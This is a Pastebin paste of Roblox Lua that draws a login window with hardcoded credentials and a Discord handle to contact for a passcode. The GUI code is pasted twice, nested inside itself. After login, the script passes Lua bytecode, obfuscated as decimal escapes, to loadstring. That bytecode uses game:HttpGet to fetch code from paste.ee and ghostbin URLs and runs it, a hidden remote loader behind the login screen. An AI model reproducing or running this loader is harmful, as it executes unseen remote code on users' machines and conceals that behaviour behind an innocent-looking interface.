Advertisement
Guest User

Untitled

a guest
Jul 10th, 2018
105
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 13.45 KB | None | 0 0
  1. local a=Instance.new("ScreenGui")
  2. local b=Instance.new("Frame")
  3. local c=Instance.new("Frame")
  4. local d=Instance.new("TextLabel")
  5. local e=Instance.new("Frame")
  6. local f=Instance.new("Frame")
  7. local g=Instance.new("TextBox")
  8. local h=Instance.new("Frame")
  9. local i=Instance.new("TextLabel")
  10. local j=Instance.new("Frame")
  11. local k=Instance.new("Frame")
  12. local l=Instance.new("TextBox")
  13. local m=Instance.new("TextButton")
  14. local n=Instance.new("Frame")
  15. local o=Instance.new("Frame")
  16. local p=Instance.new("Frame")
  17. local q=Instance.new("TextLabel")
  18. local r=Instance.new("TextButton")
  19. local s=Instance.new("Frame")
  20. local t=Instance.new("Frame")
  21.  
  22.  
  23. a.Parent=game.CoreGui;
  24. a.Name="password"
  25.  
  26.  
  27. b.Name="Background"
  28. b.Parent=a;
  29. b.Active=true;
  30. b.BackgroundColor3=Color3.new(0.337255,0.337255,0.337255)
  31. b.BorderColor3=Color3.new(0.184314,0,0)
  32. b.BorderSizePixel=0;b.Draggable=true;
  33. b.Position=UDim2.new(0.5,-165,0.5,-65)
  34. b.Size=UDim2.new(0,330,0,130)
  35.  
  36.  
  37. c.Name="Username"
  38. c.Parent=b;
  39. c.BackgroundColor3=Color3.new(0.137255,0.137255,0.137255)
  40. c.BorderColor3=Color3.new(0.235294,0.235294,0.235294)
  41. c.Position=UDim2.new(0,76,0,35)
  42. c.Size=UDim2.new(0,249,0,25)
  43.  
  44.  
  45. d.Name="Label"
  46. d.Parent=c;
  47. d.BackgroundColor3=Color3.new(1,1,1)
  48. d.BackgroundTransparency=1;
  49. d.BorderColor3=Color3.new(0,0,0)
  50. d.Position=UDim2.new(-0.285140574,0,0,0)
  51. d.Size=UDim2.new(0,71,0,25)
  52. d.Font=Enum.Font.SourceSansBold;
  53. d.Text="Username:"
  54. d.TextColor3=Color3.new(1,1,1)
  55. d.TextSize=14;
  56. d.TextXAlignment=Enum.TextXAlignment.Left;
  57.  
  58.  
  59. e.Name="Deco"e.Parent=c;
  60. e.BackgroundColor3=Color3.new(0.0784314,0.0784314,0.0784314)
  61. e.BorderColor3=Color3.new(0,0,0)e.BorderSizePixel=0;
  62. e.Position=UDim2.new(0,0,1,-2)
  63. e.Size=UDim2.new(0,249,0,2)
  64.  
  65.  
  66. f.Name="Deco"f.Parent=c;
  67. f.BackgroundColor3=Color3.new(0.0784314,0.0784314,0.0784314)
  68. f.BorderColor3=Color3.new(0,0,0)
  69. f.BorderSizePixel=0;
  70. f.Position=UDim2.new(1,-2,0.0799999982,-2)
  71. f.Size=UDim2.new(0,2,0,25)
  72.  
  73.  
  74. g.Name="UsernameBox"g.Parent=c;
  75. g.BackgroundColor3=Color3.new(0,0,0)
  76. g.BackgroundTransparency=1;
  77. g.BorderColor3=Color3.new(0,0,0)
  78. g.BorderSizePixel=0;
  79. g.ClipsDescendants=true;
  80. g.ClearTextOnFocus=false;
  81. g.Position=UDim2.new(0,5,0,0)
  82. g.Size=UDim2.new(0,235,0,25)
  83. g.Font=Enum.Font.Code;
  84. g.PlaceholderColor3=Color3.new(0.392157,0.392157,0.392157)
  85. g.PlaceholderText="Username"
  86. g.Text=""
  87. g.TextColor3=Color3.new(0.392157,0.392157,0.392157)
  88. g.TextSize=14;
  89. g.TextXAlignment=Enum.TextXAlignment.Left;
  90.  
  91.  
  92. h.Name="Password"h.Parent=b;
  93. h.BackgroundColor3=Color3.new(0.137255,0.137255,0.137255)
  94. h.BorderColor3=Color3.new(0.235294,0.235294,0.235294)
  95. h.Position=UDim2.new(0,76,0,66)
  96. h.Size=UDim2.new(0,249,0,25)
  97.  
  98.  
  99. i.Name="Label"i.Parent=h;
  100. i.BackgroundColor3=Color3.new(1,1,1)
  101. i.BackgroundTransparency=1;
  102. i.BorderColor3=Color3.new(0,0,0)
  103. i.Position=UDim2.new(-0.284000009,0,0,0)
  104. i.Size=UDim2.new(0,71,0,25)
  105. i.Font=Enum.Font.SourceSansBold;
  106. i.Text="Password:"
  107. i.TextColor3=Color3.new(1,1,1)
  108. i.TextSize=14;
  109. i.TextXAlignment=Enum.TextXAlignment.Left;
  110.  
  111.  
  112. j.Name="Deco"j.Parent=h;
  113. j.BackgroundColor3=Color3.new(0.0784314,0.0784314,0.0784314)
  114. j.BorderColor3=Color3.new(0,0,0)j.BorderSizePixel=0;
  115. j.Position=UDim2.new(0,0,1,-2)
  116. j.Size=UDim2.new(0,249,0,2)
  117.  
  118.  
  119. k.Name="Deco"k.Parent=h;
  120. k.BackgroundColor3=Color3.new(0.0784314,0.0784314,0.0784314)
  121. k.BorderColor3=Color3.new(0,0,0)
  122. k.BorderSizePixel=0;k.Position=UDim2.new(1,-2,0.0799999982,-2)
  123. k.Size=UDim2.new(0,2,0,25)
  124.  
  125.  
  126. l.Name="PasswordBox"l.Parent=h;
  127. l.BackgroundColor3=Color3.new(0.419608,0.419608,0.419608)
  128. l.BackgroundTransparency=1;
  129. l.BorderColor3=Color3.new(0,0,0)
  130. l.BorderSizePixel=0;
  131. l.ClearTextOnFocus=false;
  132. l.ClipsDescendants=true;
  133. l.Position=UDim2.new(0,5,0,0)
  134. l.Size=UDim2.new(0,235,0,25)
  135. l.ZIndex=2;l.Font=Enum.Font.Code;
  136. l.PlaceholderColor3=Color3.new(0.34902,0.34902,0.34902)
  137. l.PlaceholderText="********"l.Text=""
  138. l.TextColor3=Color3.new(0.34902,0.34902,0.34902)
  139. l.TextSize=14;
  140. l.TextStrokeColor3=Color3.new(0.34902,0.34902,0.34902)
  141. l.TextWrapped=true;
  142. l.TextXAlignment=Enum.TextXAlignment.Left;
  143.  
  144.  
  145. m.Name="Login"m.Parent=b;
  146. m.BackgroundColor3=Color3.new(0.137255,0.137255,0.137255)
  147. m.BorderColor3=Color3.new(0.235294,0.235294,0.235294)
  148. m.Position=UDim2.new(0,5,0,97)m.Size=UDim2.new(0,320,0,25)
  149. m.Font=Enum.Font.Code;m.Text="Login"
  150. m.TextColor3=Color3.new(0.392157,0.392157,0.392157)
  151. m.TextSize=14;n.Name="Deco"
  152.  
  153.  
  154. n.Parent=m;
  155. n.BackgroundColor3=Color3.new(0.0784314,0.0784314,0.0784314)
  156. n.BorderColor3=Color3.new(0,0,0)
  157. n.BorderSizePixel=0;
  158. n.Position=UDim2.new(0,0,1,-2)
  159. n.Size=UDim2.new(0,318,0,2)
  160.  
  161.  
  162. o.Name="Deco"o.Parent=m;
  163. o.BackgroundColor3=Color3.new(0.0784314,0.0784314,0.0784314)
  164. o.BorderColor3=Color3.new(0,0,0)
  165. o.BorderSizePixel=0;o.Position=UDim2.new(1,-2,0.0799999982,-2)
  166. o.Size=UDim2.new(0,2,0,25)
  167.  
  168.  
  169. p.Name="Topbar"
  170. p.Parent=b;
  171. p.BackgroundColor3=Color3.new(0.258824,0.258824,0.258824)
  172. p.BorderColor3=Color3.new(0.2,0.2,0.2)
  173. p.BorderSizePixel=0;p.Size=UDim2.new(1,0,0,30)
  174.  
  175.  
  176. q.Name="Title"q.Parent=p;
  177. q.BackgroundColor3=Color3.new(1,1,1)
  178. q.BackgroundTransparency=1;
  179. q.BorderColor3=Color3.new(0,0,0)
  180. q.Position=UDim2.new(0,5,0,0)
  181. q.Size=UDim2.new(0.824999988,0,0,30)
  182. q.Font=Enum.Font.Code;
  183. q.Text="Contact CΛJUNPHOΞNIX#5953 for passcode - Login"
  184. q.TextColor3=Color3.new(1,1,1)
  185. q.TextSize=12;q.TextWrapped=true;
  186. q.TextXAlignment=Enum.TextXAlignment.Left;
  187.  
  188.  
  189. r.Name="Exit"r.Parent=p;
  190. r.BackgroundColor3=Color3.new(0.27451,0.27451,0.27451)
  191. r.BorderColor3=Color3.new(0.262745,0.262745,0.262745)
  192. r.BorderSizePixel=0;r.Position=UDim2.new(1,-30,0,0)
  193. r.Size=UDim2.new(0,30,0,30)
  194. r.Font=Enum.Font.SourceSansBold;
  195. r.Text="X"
  196. r.TextColor3=Color3.new(1,1,1)
  197. r.TextSize=16;
  198.  
  199.  
  200. s.Name="Deco"
  201. s.Parent=p;
  202. s.BackgroundColor3=Color3.new(0.337255,0.337255,0.337255)
  203. s.BorderColor3=Color3.new(0,0,0)
  204. s.BorderSizePixel=0;
  205. s.Position=UDim2.new(0,0,1,-1)
  206. s.Size=UDim2.new(0,330,0,1)
  207.  
  208.  
  209. t.Name="Deco"
  210. t.Parent=p;
  211. t.BackgroundColor3=Color3.new(0.337255,0.337255,0.337255)
  212. t.BorderColor3=Color3.new(0,0,0)t.BorderSizePixel=0;
  213. t.Size=UDim2.new(0,330,0,1)
  214.  
  215.  
  216. local c="User"
  217. local h="Admin"
  218.  
  219.  
  220. m.MouseButton1Click:connect(function()
  221. if g.Text==c and l.Text==h then
  222. b:TweenPosition(UDim2.new(2,0,0.291719735,0),"Out","Sine",1)
  223. wait(0.3)a:remove()local a=Instance.new("ScreenGui")
  224. local b=Instance.new("Frame")
  225. local c=Instance.new("Frame")
  226. local d=Instance.new("TextLabel")
  227. local e=Instance.new("Frame")
  228. local f=Instance.new("Frame")
  229. local g=Instance.new("TextBox")
  230. local h=Instance.new("Frame")
  231. local i=Instance.new("TextLabel")
  232. local j=Instance.new("Frame")
  233. local k=Instance.new("Frame")
  234. local l=Instance.new("TextBox")
  235. local m=Instance.new("TextButton")
  236. local n=Instance.new("Frame")
  237. local o=Instance.new("Frame")
  238. local p=Instance.new("Frame")
  239. local q=Instance.new("TextLabel")
  240. local r=Instance.new("TextButton")
  241. local s=Instance.new("Frame")
  242. local t=Instance.new("Frame")
  243.  
  244.  
  245. a.Parent=game.CoreGui;
  246. a.Name="password"
  247.  
  248.  
  249. b.Name="Background"
  250. b.Parent=a;
  251. b.Active=true;
  252. b.BackgroundColor3=Color3.new(0.337255,0.337255,0.337255)
  253. b.BorderColor3=Color3.new(0.184314,0,0)
  254. b.BorderSizePixel=0;b.Draggable=true;
  255. b.Position=UDim2.new(0.5,-165,0.5,-65)
  256. b.Size=UDim2.new(0,330,0,130)
  257.  
  258.  
  259. c.Name="Username"
  260. c.Parent=b;
  261. c.BackgroundColor3=Color3.new(0.137255,0.137255,0.137255)
  262. c.BorderColor3=Color3.new(0.235294,0.235294,0.235294)
  263. c.Position=UDim2.new(0,76,0,35)
  264. c.Size=UDim2.new(0,249,0,25)
  265.  
  266.  
  267. d.Name="Label"
  268. d.Parent=c;
  269. d.BackgroundColor3=Color3.new(1,1,1)
  270. d.BackgroundTransparency=1;
  271. d.BorderColor3=Color3.new(0,0,0)
  272. d.Position=UDim2.new(-0.285140574,0,0,0)
  273. d.Size=UDim2.new(0,71,0,25)
  274. d.Font=Enum.Font.SourceSansBold;
  275. d.Text="Username:"
  276. d.TextColor3=Color3.new(1,1,1)
  277. d.TextSize=14;
  278. d.TextXAlignment=Enum.TextXAlignment.Left;
  279.  
  280.  
  281. e.Name="Deco"e.Parent=c;
  282. e.BackgroundColor3=Color3.new(0.0784314,0.0784314,0.0784314)
  283. e.BorderColor3=Color3.new(0,0,0)e.BorderSizePixel=0;
  284. e.Position=UDim2.new(0,0,1,-2)
  285. e.Size=UDim2.new(0,249,0,2)
  286.  
  287.  
  288. f.Name="Deco"f.Parent=c;
  289. f.BackgroundColor3=Color3.new(0.0784314,0.0784314,0.0784314)
  290. f.BorderColor3=Color3.new(0,0,0)
  291. f.BorderSizePixel=0;
  292. f.Position=UDim2.new(1,-2,0.0799999982,-2)
  293. f.Size=UDim2.new(0,2,0,25)
  294.  
  295.  
  296. g.Name="UsernameBox"g.Parent=c;
  297. g.BackgroundColor3=Color3.new(0,0,0)
  298. g.BackgroundTransparency=1;
  299. g.BorderColor3=Color3.new(0,0,0)
  300. g.BorderSizePixel=0;
  301. g.ClipsDescendants=true;
  302. g.ClearTextOnFocus=false;
  303. g.Position=UDim2.new(0,5,0,0)
  304. g.Size=UDim2.new(0,235,0,25)
  305. g.Font=Enum.Font.Code;
  306. g.PlaceholderColor3=Color3.new(0.392157,0.392157,0.392157)
  307. g.PlaceholderText="Username"
  308. g.Text=""
  309. g.TextColor3=Color3.new(0.392157,0.392157,0.392157)
  310. g.TextSize=14;
  311. g.TextXAlignment=Enum.TextXAlignment.Left;
  312.  
  313.  
  314. h.Name="Password"h.Parent=b;
  315. h.BackgroundColor3=Color3.new(0.137255,0.137255,0.137255)
  316. h.BorderColor3=Color3.new(0.235294,0.235294,0.235294)
  317. h.Position=UDim2.new(0,76,0,66)
  318. h.Size=UDim2.new(0,249,0,25)
  319.  
  320.  
  321. i.Name="Label"i.Parent=h;
  322. i.BackgroundColor3=Color3.new(1,1,1)
  323. i.BackgroundTransparency=1;
  324. i.BorderColor3=Color3.new(0,0,0)
  325. i.Position=UDim2.new(-0.284000009,0,0,0)
  326. i.Size=UDim2.new(0,71,0,25)
  327. i.Font=Enum.Font.SourceSansBold;
  328. i.Text="Password:"
  329. i.TextColor3=Color3.new(1,1,1)
  330. i.TextSize=14;
  331. i.TextXAlignment=Enum.TextXAlignment.Left;
  332.  
  333.  
  334. j.Name="Deco"j.Parent=h;
  335. j.BackgroundColor3=Color3.new(0.0784314,0.0784314,0.0784314)
  336. j.BorderColor3=Color3.new(0,0,0)j.BorderSizePixel=0;
  337. j.Position=UDim2.new(0,0,1,-2)
  338. j.Size=UDim2.new(0,249,0,2)
  339.  
  340.  
  341. k.Name="Deco"k.Parent=h;
  342. k.BackgroundColor3=Color3.new(0.0784314,0.0784314,0.0784314)
  343. k.BorderColor3=Color3.new(0,0,0)
  344. k.BorderSizePixel=0;k.Position=UDim2.new(1,-2,0.0799999982,-2)
  345. k.Size=UDim2.new(0,2,0,25)
  346.  
  347.  
  348. l.Name="PasswordBox"l.Parent=h;
  349. l.BackgroundColor3=Color3.new(0.419608,0.419608,0.419608)
  350. l.BackgroundTransparency=1;
  351. l.BorderColor3=Color3.new(0,0,0)
  352. l.BorderSizePixel=0;
  353. l.ClearTextOnFocus=false;
  354. l.ClipsDescendants=true;
  355. l.Position=UDim2.new(0,5,0,0)
  356. l.Size=UDim2.new(0,235,0,25)
  357. l.ZIndex=2;l.Font=Enum.Font.Code;
  358. l.PlaceholderColor3=Color3.new(0.34902,0.34902,0.34902)
  359. l.PlaceholderText="********"l.Text=""
  360. l.TextColor3=Color3.new(0.34902,0.34902,0.34902)
  361. l.TextSize=14;
  362. l.TextStrokeColor3=Color3.new(0.34902,0.34902,0.34902)
  363. l.TextWrapped=true;
  364. l.TextXAlignment=Enum.TextXAlignment.Left;
  365.  
  366.  
  367. m.Name="Login"m.Parent=b;
  368. m.BackgroundColor3=Color3.new(0.137255,0.137255,0.137255)
  369. m.BorderColor3=Color3.new(0.235294,0.235294,0.235294)
  370. m.Position=UDim2.new(0,5,0,97)m.Size=UDim2.new(0,320,0,25)
  371. m.Font=Enum.Font.Code;m.Text="Login"
  372. m.TextColor3=Color3.new(0.392157,0.392157,0.392157)
  373. m.TextSize=14;n.Name="Deco"
  374.  
  375.  
  376. n.Parent=m;
  377. n.BackgroundColor3=Color3.new(0.0784314,0.0784314,0.0784314)
  378. n.BorderColor3=Color3.new(0,0,0)
  379. n.BorderSizePixel=0;
  380. n.Position=UDim2.new(0,0,1,-2)
  381. n.Size=UDim2.new(0,318,0,2)
  382.  
  383.  
  384. o.Name="Deco"o.Parent=m;
  385. o.BackgroundColor3=Color3.new(0.0784314,0.0784314,0.0784314)
  386. o.BorderColor3=Color3.new(0,0,0)
  387. o.BorderSizePixel=0;o.Position=UDim2.new(1,-2,0.0799999982,-2)
  388. o.Size=UDim2.new(0,2,0,25)
  389.  
  390.  
  391. p.Name="Topbar"
  392. p.Parent=b;
  393. p.BackgroundColor3=Color3.new(0.258824,0.258824,0.258824)
  394. p.BorderColor3=Color3.new(0.2,0.2,0.2)
  395. p.BorderSizePixel=0;p.Size=UDim2.new(1,0,0,30)
  396.  
  397.  
  398. q.Name="Title"q.Parent=p;
  399. q.BackgroundColor3=Color3.new(1,1,1)
  400. q.BackgroundTransparency=1;
  401. q.BorderColor3=Color3.new(0,0,0)
  402. q.Position=UDim2.new(0,5,0,0)
  403. q.Size=UDim2.new(0.824999988,0,0,30)
  404. q.Font=Enum.Font.Code;
  405. q.Text="Contact CΛJUNPHOΞNIX#5953 for passcode - Login"
  406. q.TextColor3=Color3.new(1,1,1)
  407. q.TextSize=12;q.TextWrapped=true;
  408. q.TextXAlignment=Enum.TextXAlignment.Left;
  409.  
  410.  
  411. r.Name="Exit"r.Parent=p;
  412. r.BackgroundColor3=Color3.new(0.27451,0.27451,0.27451)
  413. r.BorderColor3=Color3.new(0.262745,0.262745,0.262745)
  414. r.BorderSizePixel=0;r.Position=UDim2.new(1,-30,0,0)
  415. r.Size=UDim2.new(0,30,0,30)
  416. r.Font=Enum.Font.SourceSansBold;
  417. r.Text="X"
  418. r.TextColor3=Color3.new(1,1,1)
  419. r.TextSize=16;
  420.  
  421.  
  422. s.Name="Deco"
  423. s.Parent=p;
  424. s.BackgroundColor3=Color3.new(0.337255,0.337255,0.337255)
  425. s.BorderColor3=Color3.new(0,0,0)
  426. s.BorderSizePixel=0;
  427. s.Position=UDim2.new(0,0,1,-1)
  428. s.Size=UDim2.new(0,330,0,1)
  429.  
  430.  
  431. t.Name="Deco"
  432. t.Parent=p;
  433. t.BackgroundColor3=Color3.new(0.337255,0.337255,0.337255)
  434. t.BorderColor3=Color3.new(0,0,0)t.BorderSizePixel=0;
  435. t.Size=UDim2.new(0,330,0,1)
  436.  
  437.  
  438. local c="User"
  439. local h="Admin"
  440.  
  441.  
  442. m.MouseButton1Click:connect(function()
  443. if g.Text==c and l.Text==h then
  444. b:TweenPosition(UDim2.new(2,0,0.291719735,0),"Out","Sine",1)
  445. wait(0.3)a:remove()loadstring('\27\76\117\97\81\0\1\4\4\4\8\0\43\0\0\0\61\80\108\97\121\101\114\115\46\75\89\76\69\84\72\79\82\78\84\79\78\46\66\97\99\107\112\97\99\107\46\76\111\99\97\108\83\99\114\105\112\116\0\13\0\0\0\18\0\0\0\0\0\0\5\17\0\0\0\5\0\0\0\69\64\0\0\75\128\192\0\193\192\0\0\2\1\128\0\92\0\0\2\28\128\0\0\28\64\128\0\5\0\0\0\69\64\0\0\75\128\192\0\193\0\1\0\2\1\128\0\92\0\0\2\28\128\0\0\28\64\128\0\30\0\128\0\5\0\0\0\4\11\0\0\0\108\111\97\100\115\116\114\105\110\103\0\4\5\0\0\0\103\97\109\101\0\4\8\0\0\0\72\116\116\112\71\101\116\0\4\25\0\0\0\104\116\116\112\115\58\47\47\112\97\115\116\101\46\101\101\47\114\47\113\76\111\76\71\0\4\37\0\0\0\104\116\116\112\115\58\47\47\103\104\111\115\116\98\105\110\46\99\111\109\47\112\97\115\116\101\47\100\117\117\118\97\47\114\97\119\0\0\0\0\0\17\0\0\0\15\0\0\0\15\0\0\0\15\0\0\0\15\0\0\0\15\0\0\0\15\0\0\0\15\0\0\0\15\0\0\0\16\0\0\0\16\0\0\0\16\0\0\0\16\0\0\0\16\0\0\0\16\0\0\0\16\0\0\0\16\0\0\0\18\0\0\0\0\0\0\0\0\0\0\0')()end end)
  446. r.MouseButton1Click:connect(function()b:TweenPosition(UDim2.new(2,0,0.291719735,0),"Out","Sine",1)wait(1)a:remove()end)()end end)
  447. r.MouseButton1Click:connect(function()b:TweenPosition(UDim2.new(2,0,0.291719735,0),"Out","Sine",1)wait(1)a:remove()end)
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement